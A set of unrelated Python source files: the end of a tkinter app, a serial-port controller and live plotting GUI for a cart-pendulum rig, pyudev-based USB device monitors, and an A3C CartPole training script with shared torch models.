pin_dark = PhotoImage(file="./assets/images/dark/pin.png")
pin_light = PhotoImage(file="./assets/images/light/pin.png")
github_logo_dark = PhotoImage(file="./assets/images/dark/github.png")
github_logo_light = PhotoImage(file="./assets/images/light/github.png")
globe_dark = PhotoImage(file="./assets/images/dark/globe.png")
globe_light = PhotoImage(file="./assets/images/light/globe.png")
logo = PhotoImage(file="./assets/logo_new_150x150.png")
if theme == "Dark":
settings_btn.configure(image=settings_image_dark)
elif theme == "Light":
settings_btn.configure(image=settings_image_light)
time_display.configure(fg="black")
time_selected_display.configure(fg="black")
if system() == "Windows":
makeWindowsBlur()
prev_state = app.state()
print(prev_state)
# app.bind("<Expose>", fullredraw)
app.bind("<Configure>", sizechanged)
app.wait_visibility()
app.attributes("-alpha", config["transperency"])
# UPDATE
app.after(500, Thread(target=checkForUpdates, args=(ver,)).start)
# TKINTER MAINLOOP
app.mainloop()
|
pendcon.py
|
# -*- coding: utf-8 -*-
import datetime
import math
import queue
import serial
import struct
import threading
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib.gridspec import GridSpec
from matplotlib.widgets import Button, TextBox
from matplotlib.patches import Rectangle
import matplotlib.style as mplstyle
mplstyle.use('fast')
class PenConGui(object):
def __init__(self):
#
# Time series plots figure
#
self.plotfig = plt.figure(tight_layout=False, dpi=192)
pgs = GridSpec(6, 1, figure=self.plotfig, height_ratios=[1,1,1,0.2,1,0.2],
top=.99, bottom=0.01, left=0.05, right=0.99,
wspace=0.05, hspace=0.05)
self.ax_velocity = self.plotfig.add_subplot(pgs[2, :])
self.ax_velocity.ticklabel_format(axis="x", style="plain")
self.ax_velocity.set_ylim([-10000, 10000])
self.ax_angle = self.plotfig.add_subplot(pgs[0, :], sharex=self.ax_velocity)
plt.setp(self.ax_angle.get_xticklabels(), visible=False)
self.ax_angle.set_ylim([-math.pi, math.pi])
self.ax_angle.set_ymargin(0.0)
self.ax_position = self.plotfig.add_subplot(pgs[1, :], sharex=self.ax_velocity)
plt.setp(self.ax_position.get_xticklabels(), visible=False)
self.ax_position.set_ylim([-0.25, 0.25])
self.ax_position.set_ymargin(0.0)
self.axCP = self.plotfig.add_subplot(pgs[4,:])
self.cartW = 0.08
self.cartH = 0.05
cmap = plt.get_cmap("tab10")
cartColor = cmap(0)
pendColor = cmap(1)
""" Plot cart pendulum animation"""
self.cart = Rectangle(np.array([0.0, 0.0]) - [0.5 * self.cartW, 0.5 * self.cartH], self.cartW, self.cartH, color = cartColor)
self.axCP.axhline(y=0, linewidth=2, color=cartColor)
self.ln = self.axCP.plot([],[], linewidth = 2, marker = '.', color = pendColor)[0]
self.axCP.axis('equal')
self.axCP.set_ylim([-0.6, 0.4])
self.axCP.set_xlim([-0.75, 0.75])
self.axCP.set_xlabel('Position (m)')
#
# Control Buttons figure
#
self.controlfig = plt.figure(tight_layout=False, dpi=192)
cgs = GridSpec(9, 9, figure=self.controlfig, width_ratios=[1.5,1.5,0.5,2,2,2,0.5,2,2],
top=.99, bottom=0.01, left=0.05, right=0.99,
wspace=0.05, hspace=0.05)
self.ax_notebox = self.controlfig.add_subplot(cgs[0, :2])
self.textbox_note = TextBox(self.ax_notebox, label=None, initial="Notes")
self.ax_button_record = self.controlfig.add_subplot(cgs[1, 0])
self.button_record = Button(self.ax_button_record, 'Record')
self.button_record.hovercolor = "red"
self.ax_durationbox = self.controlfig.add_subplot(cgs[1, 1])
self.textbox_duration = TextBox(self.ax_durationbox, label=None, initial="10")
self.ax_button_cosine = self.controlfig.add_subplot(cgs[2, 0])
self.button_cosine = Button(self.ax_button_cosine, 'Cosine')
self.ax_button_step = self.controlfig.add_subplot(cgs[2, 1])
self.button_step = Button(self.ax_button_step, 'Step')
# self.ax_button_cosine_pid = self.controlfig.add_subplot(cgs[3, 0])
# self.button_cosine_pid = Button(self.ax_button_cosine_pid, 'Cos (PID)')
#
# self.ax_button_step_pid = self.controlfig.add_subplot(cgs[3, 1])
# self.button_step_pid = Button(self.ax_button_step_pid, 'Step (PID)')
# self.ax_button_pid = self.controlfig.add_subplot(cgs[4, 0:2])
# self.button_pid = Button(self.ax_button_pid, 'Set Gains')
self.ax_button_calib = self.controlfig.add_subplot(cgs[6, 0:2])
self.button_calib = Button(self.ax_button_calib, 'Calibrate')
self.ax_button_disable = self.controlfig.add_subplot(cgs[7, 0:2])
self.button_disable = Button(self.ax_button_disable, 'Disable')
# self.ax_textbox_pid_p = self.controlfig.add_subplot(cgs[6, 5])
# self.ax_textbox_pid_p.set_title("Gains")
# self.textbox_pid_p = TextBox(self.ax_textbox_pid_p, label="kP ", initial="1.0")
# self.ax_textbox_pid_i = self.controlfig.add_subplot(cgs[7, 5])
# self.textbox_pid_i = TextBox(self.ax_textbox_pid_i, label="kI ", initial="0.0")
# self.ax_textbox_pid_d = self.controlfig.add_subplot(cgs[8, 5])
# self.textbox_pid_d = TextBox(self.ax_textbox_pid_d, label="kD ", initial="0.0")
#
self.ax_textbox_cos_mag = []
self.ax_textbox_cos_freq = []
self.ax_textbox_cos_phase = []
self.textbox_cos_mag = []
self.textbox_cos_freq = []
self.textbox_cos_phase = []
for ndx, i in enumerate(range(1,5)):
self.ax_textbox_cos_mag.append(self.controlfig.add_subplot(cgs[i, 3]))
self.ax_textbox_cos_freq.append(self.controlfig.add_subplot(cgs[i, 4]))
self.ax_textbox_cos_phase.append(self.controlfig.add_subplot(cgs[i, 5]))
if ndx == 0:
self.ax_textbox_cos_mag[-1].set_title("Mag (norm.)")
self.ax_textbox_cos_freq[-1].set_title("Freq (Hz)")
self.ax_textbox_cos_phase[-1].set_title("Phase (s)")
self.textbox_cos_mag.append(TextBox(self.ax_textbox_cos_mag[-1], label=str(ndx+1)+" ", initial="0.0"))
self.textbox_cos_freq.append(TextBox(self.ax_textbox_cos_freq[-1], label=None, initial="0.0"))
self.textbox_cos_phase.append(TextBox(self.ax_textbox_cos_phase[-1], label=None, initial="0.0"))
self.ax_textbox_step_mag = []
self.ax_textbox_step_phase = []
self.textbox_step_mag = []
self.textbox_step_phase = []
for ndx, i in enumerate(range(1,9)):
self.ax_textbox_step_mag.append(self.controlfig.add_subplot(cgs[i, 7]))
self.ax_textbox_step_phase.append(self.controlfig.add_subplot(cgs[i, 8]))
if ndx == 0:
self.ax_textbox_step_mag[-1].set_title("Mag (norm.)")
self.ax_textbox_step_phase[-1].set_title("Delay (s)")
self.textbox_step_mag.append(TextBox(self.ax_textbox_step_mag[-1], label=str(ndx+1)+" ", initial="0.0"))
self.textbox_step_phase.append(TextBox(self.ax_textbox_step_phase[-1], label=None, initial="0.0"))
def set_mode_color(self, active_button):
self.button_cosine.color = "lightgrey"
self.button_step.color = "lightgrey"
# self.button_pid.color = "lightgrey"
self.button_calib.color = "lightgrey"
self.button_cosine.hovercolor = "whitesmoke"
self.button_step.hovercolor = "whitesmoke"
# self.button_pid.hovercolor = "whitesmoke"
self.button_calib.hovercolor = "whitesmoke"
active_button.color = "limegreen"
active_button.hovercolor = "lightgreen"
class PendulumController(object):
PENDULUM_LENGTH_M = 0.335
Lfrac = 0.1
RADS_PER_COUNT = math.pi/512.0
METERS_PER_COUNT = 0.00009347
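# RADS_PER_COUNT of pi/512 corresponds to 2*pi rad per 1024 counts, i.e. presumably a
# 1024-count-per-revolution encoder on the pendulum axis; METERS_PER_COUNT likewise maps
# motor encoder counts to linear cart travel in metres.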
MODE_BUTTON_CONTROL = b'\x00'
MODE_CALIBRATE = b'\x01'
MODE_UART_CONTROL = b'\x02'
MODE_COSINE_CONTROL = b'\x03'
MODE_STEP_CONTROL = b'\x04'
MODE_PID_ANGLE_SPEED_CONTROL = b'\x05'
MODE_PID_ANGLE_POS_CONTROL = b'\x06'
ACTION_CODE = b'\x0A'
ACTION_DISABLE = b'\x00'
ACTION_ENABLE = b'\x01'
ACTION_RESET_CLOCK = b'\x02'
MESSAGE_HEADER = b'DEF'
STATUS_HEADER = b'ABC'
STATUS_FORMAT = "<fiiiic"
STATUS_LENGTH = struct.calcsize(STATUS_FORMAT)+len(STATUS_HEADER)
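# Status packet layout implied by STATUS_HEADER and STATUS_FORMAT (little-endian):
#   b'ABC'   3-byte header
#   f        timestamp_s                        4 bytes
#   i i i i  angle, position, velocity and      16 bytes
#            motor command (raw counts)
#   c        trailing byte, presumably '\n',    1 byte (discarded in serial_read_loop)
# struct.calcsize("<fiiiic") == 21, so STATUS_LENGTH == 24 including the header.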
DATA_RATE_HZ = 100
MAX_DATAPOINTS = 1000
PLOT_WINDOW = 1000
def __init__(self, port='COM1'):
self.ser = serial.Serial(port=port,
baudrate=256000,
bytesize=8,
parity='N',
stopbits=1,
timeout=None)
self.gui = PenConGui()
self.gui.button_record.on_clicked(self.record_button_cb)
self.gui.button_disable.on_clicked(self.action_disable)
self.gui.button_step.on_clicked(self.step_button_cb)
self.gui.button_calib.on_clicked(self.calib_button_cb)
self.gui.button_cosine.on_clicked(self.cosine_button_cb)
# self.gui.button_pid.on_clicked(self.pid_button_cb)
self.gui.controlfig.canvas.mpl_connect('close_event', self.shutdown)
self.gui.plotfig.canvas.mpl_connect('close_event', self.shutdown)
x = np.linspace(-self.PLOT_WINDOW/self.DATA_RATE_HZ, 0, self.PLOT_WINDOW)
y = np.sin(x)
self.motor1_counts_plot, = self.gui.ax_position.plot(x, y, color='blue')
self.angle_plot, = self.gui.ax_angle.plot(x, y, color='red')
self.motor1_cps_plot, = self.gui.ax_velocity.plot(x, y)
self.motor1_command_plot, = self.gui.ax_velocity.plot(x, y)
self.motor1_setpoint_plot, = self.gui.ax_velocity.plot(x, y)
self.ani = animation.FuncAnimation(self.gui.plotfig,
self.animate,
init_func=self.init,
interval=30,
blit=True,
frames=self.data_write_loop,
repeat=True)
self.gui.ax_angle.legend(["Pendulum Angle (radians)"], loc="upper left")
self.gui.ax_position.legend(["Cart X position (meters)"], loc="upper left")
self.gui.ax_velocity.legend(["Motor Velocity (counts/second)", "Motor Command", "PID Setpoint"], loc="upper left")
self.dataqueue = queue.Queue(maxsize=self.PLOT_WINDOW)
self.plotdata = np.empty((self.PLOT_WINDOW, 5))
self.recorddata = np.empty((self.MAX_DATAPOINTS, 5))
self.record_count = 0
self.recording = threading.Event()
self.stopping = threading.Event()
self.serial_read_thread = threading.Thread(target=self.serial_read_loop)
self.serial_read_thread.start()
self.data_write_thread = threading.Thread(target=self.data_write_loop)
self.data_write_thread.start()
def __del__(self):
self.close_serial()
def close_serial(self):
self.ser.close()
print("serial port closed")
def set_button_mode(self):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_BUTTON_CONTROL)
self.ser.write(b'\n')
def calibrate(self, event=None):
self.action_enable()
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_CALIBRATE)
self.ser.write(b'\n')
def calib_button_cb(self, event):
self.gui.set_mode_color(self.gui.button_calib)
self.calibrate()
def set_motor_speed(self, normalized_speed):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_UART_CONTROL)
self.ser.write(bytes(struct.pack('f', normalized_speed)))
self.ser.write(b'\n')
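# Frame written by set_motor_speed(0.5), for reference (native-endian float on the host):
#   b'DEF' + b'\x02' + struct.pack('f', 0.5) + b'\n'
# i.e. message header, MODE_UART_CONTROL, the normalized speed, then a newline terminator.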
def set_cosine_mode(self, cosinetriplets):
# cosinetriplets should be an iterable of (magnitude, frequency in Hz, phase in s) triplets
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_COSINE_CONTROL)
self.ser.write(bytes([len(cosinetriplets)]))
for triplet in cosinetriplets:
print(triplet)
self.ser.write(bytes(struct.pack('fff', float(triplet[0]), float(triplet[1]), float(triplet[2]))))
self.ser.write(b'\n')
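# Minimal usage sketch, mirroring cosine_button_cb (values are hypothetical and assume
# `controller` is a PendulumController instance):
#   controller.set_cosine_mode([(0.5, 1.0, 0.0), (0.25, 2.0, 0.1)])
#   controller.action_reset_clock()
#   controller.action_enable()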
def cosine_button_cb(self, event):
self.gui.set_mode_color(self.gui.button_cosine)
triplets = []
for i in range(len(self.gui.textbox_cos_mag)):
trip = [float(self.gui.textbox_cos_mag[i].text),
float(self.gui.textbox_cos_freq[i].text),
float(self.gui.textbox_cos_phase[i].text)]
if trip[0] == 0.0:
continue
else:
triplets.append(trip)
self.set_cosine_mode(triplets)
self.action_reset_clock()
self.action_enable()
def set_step_mode(self, steppairs):
# steppairs should be an iterable of (magnitude, delay in s) pairs
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_STEP_CONTROL)
self.ser.write(bytes([len(steppairs)]))
print(bytes([len(steppairs)]))
for pair in steppairs:
print(pair)
self.ser.write(bytes(struct.pack('ff', float(pair[0]), float(pair[1]))))
self.ser.write(b'\n')
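# Equivalent sketch for step commands, mirroring step_button_cb (hypothetical values,
# again assuming `controller` is a PendulumController instance):
#   controller.set_step_mode([(0.5, 1.0), (0.8, 3.0)])
#   controller.action_reset_clock()
#   controller.action_enable()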
def step_button_cb(self, event):
self.gui.set_mode_color(self.gui.button_step)
steppairs = []
for i in range(len(self.gui.textbox_step_mag)):
pair = [float(self.gui.textbox_step_mag[i].text),
float(self.gui.textbox_step_phase[i].text)]
if pair[0] == 0.0:
continue
else:
steppairs.append(pair)
self.set_step_mode(steppairs)
self.action_reset_clock()
self.action_enable()
def record_button_cb(self, event):
self.action_reset_clock()
self.action_enable()
self.gui.button_record.set_active(False)
self.record_count = 0
# Parse the duration textbox as a number instead of eval()-ing arbitrary input
self.MAX_DATAPOINTS = self.DATA_RATE_HZ * int(float(self.gui.textbox_duration.text))
self.recorddata = np.empty((self.MAX_DATAPOINTS, 5))
self.recording.set()
def action_enable(self, event=None):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.ACTION_CODE)
self.ser.write(self.ACTION_ENABLE)
self.ser.write(b'\n')
def action_disable(self, event=None):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.ACTION_CODE)
self.ser.write(self.ACTION_DISABLE)
self.ser.write(b'\n')
def action_reset_clock(self):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.ACTION_CODE)
self.ser.write(self.ACTION_RESET_CLOCK)
self.ser.write(b'\n')
def set_pid_speed_mode(self, kP, kI, kD):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_PID_ANGLE_SPEED_CONTROL)
self.ser.write(bytes(struct.pack('fff', kP, kI, kD)))
self.ser.write(b'\n')
def set_pid_position_mode(self, kP, kI, kD):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_PID_ANGLE_POS_CONTROL)
self.ser.write(bytes(struct.pack('fff', kP, kI, kD)))
self.ser.write(b'\n')
def pid_button_cb(self, event):
self.gui.set_mode_color(self.gui.button_pid)
def serial_read_loop(self):
while(not self.stopping.wait(0.0)):
if self.ser.in_waiting > self.STATUS_LENGTH:
if self.ser.read(1) == b'A':
if (self.ser.read(2) == b'BC'):
line = self.ser.readline()
if(len(line)==21):
rawvalues = struct.unpack(self.STATUS_FORMAT, line)[:-1]
#print(self.convert_values(rawvalues))
self.dataqueue.put(self.convert_values(rawvalues))
self.close_serial()
def data_write_loop(self):
while(not self.stopping.wait(0.0)):
while(not self.dataqueue.empty()):
try:
newrow = self.dataqueue.get_nowait()
self.plotdata = np.vstack((self.plotdata[1:, :], newrow))
if self.recording.is_set():
self.recorddata[self.record_count, :] = newrow
self.record_count+=1
if self.record_count >= self.MAX_DATAPOINTS:
self.recording.clear()
np.savetxt("pendulum_data_"+datetime.datetime.now().strftime("%B%d%Y_%I%M%p")+".csv",
self.recorddata, delimiter=',',
header=self.gui.textbox_note.text+"\n"+
"timestamp_s, angle_rad, position_m, velocity_mps, motor_command")
self.gui.button_record.set_active(True)
except queue.Empty:
pass
yield self.plotdata
def shutdown(self, event=None):
self.stopping.set()
plt.close('all')
def convert_values(self, rawvalues):
timestamp_s = rawvalues[0]
angle_rad = rawvalues[1]*self.RADS_PER_COUNT
position_m = rawvalues[2]*self.METERS_PER_COUNT
velocity_mps = rawvalues[3]#*self.METERS_PER_COUNT
motor_command = rawvalues[4]
return timestamp_s, angle_rad, position_m, velocity_mps, motor_command
def pendulumEndPts(self, x, theta):
PEP = np.array([np.array([x, 0]) + (1 - self.Lfrac) * self.PENDULUM_LENGTH_M * np.array([np.sin(theta), -np.cos(theta)]), \
np.array([x, 0]) - self.Lfrac * self.PENDULUM_LENGTH_M * np.array([np.sin(theta), -np.cos(theta)])])
return PEP[:,0], PEP[:,1]
def init(self):
self.angle_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.motor1_counts_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.motor1_cps_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.motor1_command_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.motor1_setpoint_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.gui.axCP.add_patch(self.gui.cart)
self.gui.ln.set_data(*zip((0,0), (0,0) + self.PENDULUM_LENGTH_M * np.array([np.sin(0), -np.cos(0)])))
return self.angle_plot, self.motor1_counts_plot, self.motor1_cps_plot, self.motor1_command_plot, self.motor1_setpoint_plot, self.gui.cart, self.gui.ln
def animate(self, data):
self.angle_plot.set_ydata(data[:,1])
self.motor1_counts_plot.set_ydata(data[:,2])
self.motor1_cps_plot.set_ydata(data[:,3])
self.motor1_command_plot.set_ydata(data[:,4])
self.motor1_setpoint_plot.set_ydata([0]*len(data[:,4]))
self.gui.cart.set_xy(np.array([data[-1, 2], 0]) - [0.5 * self.gui.cartW, 0.5 * self.gui.cartH])
px, py = self.pendulumEndPts(data[-1, 2],data[-1, 1])
self.gui.ln.set_data(px, py)
return self.angle_plot, self.motor1_counts_plot, self.motor1_cps_plot, self.motor1_command_plot, self.motor1_setpoint_plot, self.gui.cart, self.gui.ln
if __name__ == "__main__":
pendcon = PendulumController(port="COM7")
plt.show()
|
device_monitors.py
|
#Copyright 2013 Pieter Rautenbach
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# System imports
import logging
import threading
from time import sleep
# Constants
_VENDOR_ID_KEY = 'ID_VENDOR_ID'
_PRODUCT_ID_KEY = 'ID_MODEL_ID'
_ACTION_KEY = 'ACTION'
_ADD_ACTION = 'add'
_REMOVE_ACTION = 'remove'
class BaseDeviceMonitor(object):
'''
Base class for constructing different device monitors.
'''
def __init__(self,
logger=logging.getLogger(__name__)):
'''
Base constructor.
:param logger: local logger instance
'''
self._logger = logger
self.event_handlers = {'add': None,
'remove': None}
self.running = False
self._runLock = threading.Lock()
def _get_add_event_handler(self):
'''
The method for handling the event when a device was added.
'''
return self.event_handlers[_ADD_ACTION]
def set_add_event_handler(self, handler):
'''
Set a method for handling the event when a device was added.
:param handler: A parameterless void method.
'''
self._logger.debug('Setting a new add event handler: {0}'.
format(handler))
self.event_handlers[_ADD_ACTION] = handler
def _get_remove_event_handler(self):
'''
The method for handling the event when a device was removed.
'''
return self.event_handlers[_REMOVE_ACTION]
def set_remove_event_handler(self, handler):
'''
Set a method for handling the event when a device was removed.
:param handler: A parameterless void method.
'''
self._logger.debug('Setting a new add event handler: {0}'.
format(handler))
self.event_handlers[_REMOVE_ACTION] = handler
class PyUdevDeviceMonitor(BaseDeviceMonitor):
'''
A wrapper class for pyudev for detecting when a specific USB device is
connected or disconnected.
'''
def __init__(self,
vendor_id,
product_id,
udev_module,
logger=logging.getLogger(__name__)):
'''
Constructor.
:param vendor_id: the USB device's vendor ID
:param product_id: the USB device's product ID
:param udev_module: the imported pyudev module used to create the udev context and monitor
:param logger: local logger instance
'''
super(PyUdevDeviceMonitor, self).__init__(logger=logger)
# pyudev provides the values as hex strings, without the 0x prefix
# and padded to exactly 4 digits, e.g. 0xa12b becomes 'a12b'
self._vendor_id = vendor_id
self._product_id = product_id
# Event callback handler as a closure
def _device_event_handler(device):
vendor_id = int(device[_VENDOR_ID_KEY], 16)
product_id = int(device[_PRODUCT_ID_KEY], 16)
self._logger.debug('Device event handler invoked for '
'vid_%0#6x, pid_%0#6x',
vendor_id, product_id)
if (vendor_id != self._vendor_id or
        product_id != self._product_id):
self._logger.debug('Device does not match the \
required VID and PID \
(vid_%0#6x, pid_%0#6x)',
self._vendor_id,
self._product_id)
return
add_event_handler = self._get_add_event_handler()
remove_event_handler = self._get_remove_event_handler()
if (device[_ACTION_KEY] == _ADD_ACTION and
        add_event_handler is not None):
    add_event_handler()
elif (device[_ACTION_KEY] == _REMOVE_ACTION and
        remove_event_handler is not None):
    remove_event_handler()
else:
self._logger.debug('Unknown device event or no handler')
context = udev_module.Context()
monitor = udev_module.Monitor.from_netlink(context)
monitor.filter_by(subsystem='usb', device_type='usb_device')
# Note that the observer runs by default as a daemon thread
self._observer = (udev_module.
MonitorObserver(monitor,
callback=_device_event_handler,
name='device_observer'))
def start(self):
'''
Start the device monitor.
'''
self._logger.info("Device monitor starting")
with self._runLock:
if self.running:
self._logger.warn("Device monitor already started")
return
self.running = True
self._observer.start()
self._logger.info("Device monitor started")
def stop(self):
'''
Stop the device monitor.
'''
self._logger.info("Device monitor stopping")
with self._runLock:
if not self.running:
self._logger.warn("Device monitor already stopped")
return
# CONSIDER: Test is_alive before stopping observer
self._observer.stop()
self.running = False
self._logger.info("Device monitor stopped")
class PollingDeviceMonitor(BaseDeviceMonitor):
'''
A polling device monitor when no event-driven support is available.
'''
def __init__(self,
device,
polling_interval=1,
logger=logging.getLogger(__name__)):
'''
Constructor.
:param device: a device
:param polling_interval: the polling period in seconds
:param logger: local logger instance
'''
super(PollingDeviceMonitor, self).__init__(logger=logger)
self._polling_interval = polling_interval
self._device = device
self._thread = threading.Thread(target=self._run)
def start(self):
'''
Start the device monitor.
'''
self._logger.info("Device monitor starting")
with self._runLock:
if self.running:
self._logger.warn("Device monitor already started")
return
self.running = True
self._thread.start()
self._logger.info("Device monitor started")
def stop(self):
'''
Stop the device monitor.
'''
self._logger.info("Device monitor stopping")
with self._runLock:
if not self.running:
self._logger.warn("Device monitor already stopped")
return
self.running = False
self._thread.join()
self._logger.info("Device monitor stopped")
def _run(self):
'''
Polling thread.
'''
while self.running:
# Transition from open to closed (device removed)
if self._device.is_open():
    try:
        self._logger.debug('Device open - polling')
        if not self._device.poll():
            self._device.close()
            if self._get_remove_event_handler() is not None:
                self._get_remove_event_handler()()
    except IOError:
        self._device.close()
        if self._get_remove_event_handler() is not None:
            self._get_remove_event_handler()()
# Transition from closed to open (device added)
else:
    try:
        self._logger.debug('Trying to open device')
        self._device.open()
        if self._get_add_event_handler() is not None:
            self._get_add_event_handler()()
    except IOError:
        pass
self._logger.debug('Sleeping for {0} second(s)'.
format(self._polling_interval))
sleep(self._polling_interval)
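# Minimal usage sketch (assumes pyudev is installed; the VID/PID values are hypothetical):
#
#   import logging
#   import pyudev
#
#   logging.basicConfig(level=logging.DEBUG)
#   monitor = PyUdevDeviceMonitor(vendor_id=0x1234,
#                                 product_id=0xabcd,
#                                 udev_module=pyudev,
#                                 logger=logging.getLogger(__name__))
#   monitor.set_add_event_handler(lambda: print('device added'))
#   monitor.set_remove_event_handler(lambda: print('device removed'))
#   monitor.start()
#   ...
#   monitor.stop()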
|
main.py
|
import torch
import torch.multiprocessing as mp
import gym
from actor_nn import ActorNN
from critic_nn import CriticNN
from test_process import test_process
from train_process import train_process
if __name__ == '__main__':
#----------------------PARAMETERS-------------------------------
MAX_WORKER_GAMES = 1000
HYPERPARAMETERS = {
'lr_actor': 0.007,
'lr_critic': 0.01,
'gamma': 0.99,
'n-step': 20,
'entropy_flag': True,
'entropy_coef': 0.001,
'seed': 12,
'num_processes': 10,
'env_name': "CartPole-v1",
'max_train_games': 1000,
'max_test_games': 10,
'writer_test': False,
'writer_train': False,
'writer_log_dir': 'content/runs/AC3-16163232-2,3-n=2-e=001-seed=12++-10 ',
'print_test_results': True
}
#---------------------------------------------------------------
# Set a manual seed so the other processes don't end up with the same one
torch.manual_seed(HYPERPARAMETERS['seed'])
# Create the environment so we can get the state (input) size and action space (output) size
env = gym.make(HYPERPARAMETERS['env_name'])
# We need to create two models which will be shared across workers
device = 'cpu'  # 'cuda' if torch.cuda.is_available() else 'cpu'
shared_model_actor = ActorNN(env.observation_space.shape[0], env.action_space.n).to(device)
shared_model_critic = CriticNN(env.observation_space.shape[0]).to(device)
# Once the tensor/storage is moved to shared_memory, it will be possible to send it to other processes without making any copies.
# This is a no-op if the underlying storage is already in shared memory and for CUDA tensors. Tensors in shared memory cannot be resized.
shared_model_actor.share_memory()
shared_model_critic.share_memory()
# List of all workers/processes
processes = []
# Create a shared counter plus a lock so its value can be updated safely across processes
counter = mp.Value('i', 0)
end_flag = mp.Value('i', 0)
lock = mp.Lock()
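# Sketch of how a worker would typically bump the shared counter; the real update lives in
# train_process.py (not shown here), but the pattern with mp.Value/mp.Lock is:
#   with lock:
#       counter.value += 1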
# Start the test process: it takes the current ActorNN params, runs 10 episodes and records the rewards,
# then picks up the next, more up-to-date ActorNN params. All train processes stop once the test process
# finds the mean of the last 100 episodes to be >= 495; after that we run 90 more episodes to check whether
# the latest params (used in the last 10 episodes) are stable enough to be considered a success.
p = mp.Process(target=test_process, args=(HYPERPARAMETERS, shared_model_actor, counter, end_flag))
p.start()
processes.append(p)
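# Rough sketch of the stopping rule described above, as it might look inside test_process
# (names are hypothetical; the actual implementation lives in test_process.py):
#   if len(last_rewards) >= 100 and sum(last_rewards[-100:]) / 100 >= 495:
#       end_flag.value = 1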
# Start all training processes, passing a rank that determines the seed for the NN params
for rank in range(0, HYPERPARAMETERS['num_processes']):
p = mp.Process(target=train_process, args=(HYPERPARAMETERS, rank, shared_model_actor, shared_model_critic, counter, lock, end_flag))
p.start()
processes.append(p)
# Wait for each process to finish
for p in processes:
p.join()
# To view live progress with TensorBoard, open a new terminal and run the line below:
# tensorboard --logdir "D:\Users\Leon Jovanovic\Documents\Computer Science\Reinforcement Learning\deep-reinforcement-learning-pg-cartpole\A3C\content\runs" --host=127.0.0.1
|